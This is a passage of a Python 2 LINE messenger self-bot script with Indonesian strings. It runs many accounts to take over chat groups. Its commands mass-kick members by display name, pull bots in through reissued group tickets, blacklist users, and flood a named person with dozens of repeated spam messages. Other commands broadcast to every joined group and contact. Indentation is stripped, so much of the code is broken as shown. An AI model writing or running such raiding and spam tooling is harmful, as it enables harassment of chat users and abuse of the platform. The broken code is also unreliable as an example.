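# wait2['ROM'] since that point (those dicts are presumably filled by the read-receipt
# handler elsewhere in this script). Sketch of the reset step they all share
# (hypothetical helper name):
#
#     def reset_read_point(to, msg_id):
#         wait2['readPoint'][to] = msg_id
#         wait2['readMember'][to] = ""
#         wait2['setTime'][to] = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
#         wait2['ROM'][to] = {}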
#--------------- Purge the group without kicking fellow bots/admins ----------#
elif "Cleanse" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "ok cleanse"
_name = msg.text.replace("Cleanse","")
gs = kc.getGroup(msg.to)
cl.sendText(msg.to,"Just some casual cleansing ")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"you are not admin")
else:
for target in targets:
if not target in Bots:
if not target in admin:
try:
klist=[ki,kk,kc,ks,k1]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
cl.sendText(msg.to,"Group cleanse")
#-----------------------------------------------
#---------------- Join Group function start -----------------------#
elif msg.text in ["Join","Masuk"]: #Summon all bots
if msg.from_ in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
#kk.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
ks.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k1.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
#k5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
print "Semua Sudah Lengkap"
elif msg.text in ["Kampret join"]:
if msg.from_ in admin:
x = ki.getGroup(msg.to)
x.preventJoinByTicket = False
ki.updateGroup(x)
invsend = 0
Ti = ki.reissueGroupTicket(msg.to)
cl.acceptGroupInvitationByTicket(msg.to,Ti)
G = ki.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(msg.to)
elif msg.text in ["Luffy join"]:
if msg.from_ in admin:
x = cl.getGroup(msg.to)
x.preventJoinByTicket = False
cl.updateGroup(x)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
elif msg.text in ["Zorro join"]:
if msg.from_ in admin:
x = cl.getGroup(msg.to)
x.preventJoinByTicket = False
cl.updateGroup(x)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
kk.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
elif msg.text in ["Sanji Join"]:
if msg.from_ in admin:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
kc.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
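# NOTE: Every "... join" command above follows the same ticket dance: disable
# preventJoinByTicket, reissue a group ticket, let the other account accept it, then
# re-enable the flag. Sketch of that flow for one client pair (hypothetical helper
# name, same LINE API calls as used above):
#
#     def pull_bot_in(host, guest, gid):
#         g = host.getGroup(gid)
#         g.preventJoinByTicket = False
#         host.updateGroup(g)
#         ticket = host.reissueGroupTicket(gid)
#         guest.acceptGroupInvitationByTicket(gid, ticket)
#         g.preventJoinByTicket = True
#         host.updateGroup(g)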
#---------------------- Join Group function finish ---------------#
#------------- Leave Group function start ---------------#
elif msg.text in ["Balik all"]: #All bots leave the group, including the main bot
if msg.from_ in admin:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
#kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
ks.leaveGroup(msg.to)
k1.leaveGroup(msg.to)
k2.leaveGroup(msg.to)
k3.leaveGroup(msg.to)
k4.leaveGroup(msg.to)
#k5.leaveGroup(msg.to)
cl.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Pulang"]: #Semua Bot Ninggalin Group Kecuali Bot Induk
if msg.from_ in admin:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
#kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
ks.leaveGroup(msg.to)
k1.leaveGroup(msg.to)
k2.leaveGroup(msg.to)
k3.leaveGroup(msg.to)
k4.leaveGroup(msg.to)
k5.leaveGroup(msg.to)
#cl.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye zorro"]:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye sanji"]:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kk.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye Ussop"]:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kc.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Ojo koyo kuwe1"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Ojo koyo kuwe2"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kk.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Ojo koyo kuwe3"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kc.leaveGroup(msg.to)
except:
pass
#------------- Leave Group function finish ---------------#
#------------- Tag All function start ---------------#
elif msg.text in ["Assalammualaikum"]:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
cb = ""
cb2 = ""
strt = int(0)
akh = int(0)
for md in nama:
akh = akh + int(6)
cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},"""
strt = strt + int(7)
akh = akh + 1
cb2 += "@nrik \n"
cb = (cb[:int(len(cb)-1)])
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
cl.sendMessage(msg)
except Exception as error:
print error
elif msg.text in ["Halo"]:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
jml = len(nama)
if jml > 500:
    cl.sendText(msg.to,'Member melebihi batas.')
else:
    # Mention the members in chunks of 100; the original per-range code skipped
    # one member at every 100 boundary and missed the exact 200/300/400 cases.
    for i in range(0, jml, 100):
        mention2(msg.to, nama[i:i+100])
cnt = Message()
cnt.text = "Done : " + str(jml) + " Members"
cnt.to = msg.to
cl.sendMessage(cnt)
#------------- Tag All function finish ---------------#
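# NOTE: The tag-all commands above build a text of "@..." placeholders and attach a
# MENTION contentMetadata entry whose S/E offsets must match each placeholder's
# position in the text; mention2() is expected to do the same for a chunk of up to
# 100 mids. Sketch of building one such payload (same json module used above):
#
#     mentionees = []
#     text = ""
#     for mid_ in mids:
#         start = len(text)
#         text += "@x \n"
#         mentionees.append({"S": str(start), "E": str(start + 2), "M": mid_})
#     msg.text = text
#     msg.contentMetadata = {'MENTION': json.dumps({'MENTIONEES': mentionees}), 'EMTVER': '4'}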
elif msg.text in ["Bot Like", "Bot like"]: #Semua Bot Ngelike Status Akun Utama
if msg.from_ in owner:
print "[Command]Like executed"
cl.sendText(msg.to,"Kami Siap Like Status Owner\nKami Delay untuk beberapa Detik\nJangan perintah kami dulu sampai kami Selesai Ngelike")
try:
likePost()
except:
pass
elif msg.text in ["Like temen", "Bot like temen"]: #Semua Bot Ngelike Status Teman
if msg.from_ in owner:
print "[Command]Like executed"
cl.sendText(msg.to,"Kami Siap Like Status Teman Boss")
cl.sendText(msg.to,"Kami Siap Like Status Owner\nKami Delay untuk beberapa Detik\nJangan perintah kami dulu sampai kami Selesai Ngelike")
try:
autolike()
except:
pass
#---------------- Banned-user kick function start -----------------------#
elif msg.text in ["Kill "]:
if msg.from_ in admin:
if msg.toType == 2:
group = random.choice(KAC).getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
random.choice(KAC).sendText(msg.to,"Selamat tinggal")
random.choice(KAC).sendText(msg.to,"Jangan masuk lagidevil smile")
return
for jj in matched_list:
try:
klist=[cl,ki,kk,kc,ks]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
#---------------- Banned-user kick function finish ----------------------#
elif "Sikat" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Sikat","")
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
gs = k5.getGroup(msg.to)
random.choice(KAC).sendText(msg.to,"Eh Ini Room apaan?")
random.choice(KAC).sendText(msg.to,"Ratain aja lah\nRoom Ga Berguna..")
random.choice(KAC).sendText(msg.to,"Jangan Baper yah;")
msg.contentType = 13
# msg.contentMetadata = {'mid': mid}
random.choice(KAC).sendMessage(msg)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Not found")
else:
for target in targets:
if target in Bots or target in admin:
    pass
else:
try:
klist=[cl,ki,kk,kc,ks,k1,k2,k3,k4]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
random.choice(KAC).kickoutFromGroup(msg.to,[target])
random.choice(KAC).sendText(msg.to,"Koq Ga Ditangkis Wooyyy?\Lemah Banget Nih Room")
elif "Greet" in msg.text:
if msg.from_ in owner:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Greet","")
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
ki.sendText(msg.to,"maaf kalo gak sopan")
kk.sendText(msg.to,"makasih semuanya..")
kc.sendText(msg.to,"hehehhehe")
msg.contentType = 13
#msg.contentMetadata = {'mid': mid}
ks.sendMessage(msg)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Not found")
else:
for target in targets:
if target not in Bots:
try:
klist=[ki,kk,kc,ks,k1,k2,k3]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki.sendText(msg.to,"Group cleanse")
kk.sendText(msg.to,"Group cleanse")
kc.sendText(msg.to,"Group cleanse")
#---------------- Kick target user function start ----------------------#
elif "Nk " in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Nk ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
    if _name in s.displayName:
        targets.append(s.mid)
if targets == []:
    cl.sendText(msg.to,"user does not exist")
    pass
else:
    for target in targets:
        try:
            cl.kickoutFromGroup(msg.to,[target])
            print (msg.to,[target])
except:
random.choice(KAC).kickoutFromGroup(msg.to,[target])
elif "Hajar " in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Hajar ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
satpam.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
satpam.kickoutFromGroup(msg.to,[target])
print (msg.to,[target])
except:
satpam.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
#---------------- Kick target user function finish ----------------------#
elif "Blacklist @ " in msg.text:
if msg.from_ in admin:
_name = msg.text.replace("Blacklist @ ","")
_kicktarget = _name.rstrip(' ')
gs = random.choice(KAC).getGroup(msg.to)
targets = []
for g in gs.members:
if _kicktarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Not found")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
random.choice(KAC).sendText(msg.to,"Succes Plak")
except:
random.choice(KAC).sendText(msg.to,"error")
#---------------- Ban target user function start -----------------------#
elif "Banned @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[Banned] Sukses"
_name = msg.text.replace("Banned @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
gs = k5.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Dilarang Banned Bot")
ki.sendText(msg.to,"Dilarang Banned Bot")
kk.sendText(msg.to,"Dilarang Banned Bot")
kc.sendText(msg.to,"Dilarang Banned Bot")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
random.choice(KAC).sendText(msg.to,"Akun telah sukses di banned")
except:
random.choice(KAC).sendText(msg.to,"Error")
#---------------- Ban target user function finish -----------------------#
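# NOTE: "Banned @", "Blacklist @" and "Unban @" all persist wait["blacklist"] by
# rewriting st2__b.json with codecs + json.dump after every change. Sketch of that
# shared save step (same file name and options as used above):
#
#     def save_blacklist():
#         f = codecs.open('st2__b.json', 'w', 'utf-8')
#         json.dump(wait["blacklist"], f, sort_keys=True, indent=4, ensure_ascii=False)
#         f.close()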
#----------------Mid via Tag--------------
elif "Mid @" in msg.text:
if msg.from_ in admin:
_name = msg.text.replace("Mid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
random.choice(KAC).sendText(msg.to, g.mid)
else:
pass
#-----------------------------------------
#---------------- Unban target user function start -----------------------#
elif "Unban @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[Unban] Sukses"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
gs = k5.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Tidak Ditemukan.....")
ki.sendText(msg.to,"Tidak Ditemukan.....")
kk.sendText(msg.to,"Tidak Ditemukan.....")
kc.sendText(msg.to,"Tidak Ditemukan.....")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Akun Bersih Kembali")
except:
ki.sendText(msg.to,"Error")
#---------------- Unban target user function finish -----------------------#
#------------- Spam function start ---------------------#
elif msg.text in ["Up","up","Up Chat","Up chat","up chat","Upchat","upchat"]:
if msg.from_ in admin:
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
#kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
#kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
#kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
#kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
#kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
#kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
#kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
#kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
#kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
#kk.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
#------------- Spam function finish ---------------------#
#----------------------------[Spam To Contact]----------------------------#WORK
elif "Spamcontact @" in msg.text:
if msg.from_ in owner:
_name = msg.text.replace("Spamcontact @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
ki.sendText(g.mid,"Jangan Ngintip")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
cl.sendText(msg.to, "Target Spam, Done...!!!")
ki.sendText(msg.to, "Target Spam, Done...!!!")
k1.sendText(msg.to, "Target Spam, Done...!!!")
print " Spammed !"
#----------------------------[Spam To Contact]----------------------------#WORK
#--------------------Start-----------------------#
elif "Apakah " in msg.text:
tanya = msg.text.replace("Apakah ","")
jawab = ("Ya","Tidak","Bisa Jadi","Jangan berharap")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
elif "Berapa besar cinta " in msg.text:
tanya = msg.text.replace("Berapa besar cinta ","")
jawab = ("0%","25%","50%","75%","100%")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
elif "Siapakah cewek " in msg.text:
tanya = msg.text.replace("Siapakah cewek ","")
jawab = ("Maryati�","Ida�","Uke�","Alyn�","Ikka�","Yunikey�","Qwenie�","Gendis�","Aryani�","Nindy�","Wina�","Dewi�","Ifah�")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
elif "Siapakah cowok " in msg.text:
tanya = msg.text.replace("Siapakah cowok ","")
jawab = ("Arjun�","Ahmad khan�","Hajir�","Dd�","Indra�","Jeong�","Yogi�","Ary�","Ucil�")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
elif "Adakah " in msg.text:
tanya = msg.text.replace("Adakah ","")
jawab = ("Tidak tahu.","Ada.","Tidak ada.","Mungkin ada")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
elif "Cakepkah " in msg.text:
tanya = msg.text.replace("Cakepkah ","")
jawab = ("Jelek.","Cakep.","Lumayan.","Kaya jembut.")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
#-------------------Finish-----------------------#
#-------------Fungsi Broadcast Start------------#
elif "GBc " in msg.text: #NgeBC Ke semua Group yang di Join :D
if msg.from_ in owner:
bctxt = msg.text.replace("GBc ","")
a = cl.getGroupIdsJoined()
a = ki.getGroupIdsJoined()
a = kk.getGroupIdsJoined()
a = kc.getGroupIdsJoined()
a = ks.getGroupIdsJoined()
a = k1.getGroupIdsJoined()
a = k2.getGroupIdsJoined()
a = k3.getGroupIdsJoined()
for taf in a:
cl.sendText(taf, (bctxt))
ki.sendText(taf, (bctxt))
kk.sendText(taf, (bctxt))
kc.sendText(taf, (bctxt))
ks.sendText(taf, (bctxt))
k1.sendText(taf, (bctxt))
k2.sendText(taf, (bctxt))
k3.sendText(taf, (bctxt))
#-------------Fungsi Broadcast Start------------#
elif "Bc " in msg.text:
bctxt = msg.text.replace("Bc ","")
ki.sendText(msg.to,(bctxt))
#kk.sendText(msg.to,(bctxt))
kc.sendText(msg.to,(bctxt))
k1.sendText(msg.to,(bctxt))
#--------------Fungsi Broadcast Finish-----------#
elif msg.text in ["LG"]: #Melihat List Group
if msg.from_ in admin:
gids = cl.getGroupIdsJoined()
h = ""
for i in gids:
#####gn = cl.getGroup(i).name
h += "[•]%s Member\n" % (cl.getGroup(i).name +"👉"+str(len(cl.getGroup(i).members)))
cl.sendText(msg.to,"=======[List Group]======\n"+ h +"Total Group :"+str(len(gids)))
elif msg.text in ["LG2"]: #Melihat List Group + ID Groupnya (Gunanya Untuk Perintah InviteMeTo:)
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
#--------------List Group------------
#------------ Keluar Dari Semua Group------
elif msg.text in ["Bot pulang"]: # Keluar Dari Semua Group Yang Di dalem nya ada bot(Kalo Bot Kalian Nyangkut di Group lain :D)
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
gid = ki.getGroupIdsJoined()
gid = kk.getGroupIdsJoined()
gid = kc.getGroupIdsJoined()
gid = ks.getGroupIdsJoined()
gid = k1.getGroupIdsJoined()
gid = k2.getGroupIdsJoined()
gid = k3.getGroupIdsJoined()
gid = k4.getGroupIdsJoined()
gid = k5.getGroupIdsJoined()
for i in gid:
ks.leaveGroup(i)
kc.leaveGroup(i)
ki.leaveGroup(i)
kk.leaveGroup(i)
k1.leaveGroup(i)
k2.leaveGroup(i)
k3.leaveGroup(i)
k4.leaveGroup(i)
k5.leaveGroup(i)
#cl.leaveGroup(i)
if wait["lang"] == "JP":
kc.sendText(msg.to,"Sayonara, Bye bye all...!!!")
else:
kc.sendText(msg.to,"He declined all invitations")
#------------------------End---------------------
#-------------------------------------------------
elif "Pm cast " in msg.text:
if msg.from_ in owner:
bctxt = msg.text.replace("Pm cast ", "")
t = cl.getAllContactIds()
for manusia in t:
cl.sendText(manusia,(bctxt))
elif "Broadcast " in msg.text:
if msg.from_ in owner:
bctxt = msg.text.replace("Broadcast ", "")
n = cl.getGroupIdsJoined()
for manusia in n:
cl.sendText(manusia,(bctxt +"\n\n\nbroadcasted by:" + cl.getContact(msg.from_).displayName))
#-----------------End-----------
elif msg.text in ["hai","Hai"]:
ki.sendText(msg.to,"Hai Every Body Har Har")
kk.sendText(msg.to,"Hai Every Body Har Har")
kc.sendText(msg.to,"Hai Every Body Har Har")
#-----------------------------------------------)
elif msg.text in ["Wc","wc","kam"]:
ki.sendText(msg.to,"Selamat datang di Group Kami")
kk.sendText(msg.to,"Jangan nakal ok!")
#-----------------------------------------------
elif msg.text in ["PING","Ping","ping"]:
ki.sendText(msg.to,"PONG double thumbs upHar Har")
#kk.sendText(msg.to,"PONG double thumbs upHar Har")
kc.sendText(msg.to,"PONG double thumbs upHar Har")
#-----------------------------------------------
#-------------Fungsi Respon Start---------------------#
elif msg.text in ["Absen","Respon"]:
if msg.from_ in admin:
cl.sendText(msg.to,"★(☆─┅═ই╬BABANG_ADHI☆)(2 s★")
ki.sendText(msg.to,"★★(☆─┅═ই╬adhi☆)(2s★★")
#kk.sendText(msg.to,"★★(☆─┅═ই╬adhi☆)(2s★★")
kc.sendText(msg.to,"★★(☆─┅═ই╬adhi☆)(2s★★")
ks.sendText(msg.to,"★★(☆─┅═ই╬adhi☆)(2s★★")
k1.sendText(msg.to,"★★(☆─┅═ই╬adhi☆)(2s★★")
k2.sendText(msg.to,"★★(☆─┅═ই╬adhi☆)(2s★★")
k3.sendText(msg.to,"★★(☆─┅═ই╬adhi☆)(2s★★")
k4.sendText(msg.to,"★★(☆─┅═ই╬adhi☆)(2s★★")
k5.sendText(msg.to,"★★(☆─┅═ই╬adhi☆)(2s★★")
cl.sendText(msg.to,"Semua Hadir Boss\nSiap Protect Group\nAman Gak Aman Yang Penting Anu\n[✰ Team Bonds Kills✰]")
#-------------Fungsi Respon Finish---------------------#
#==========================================
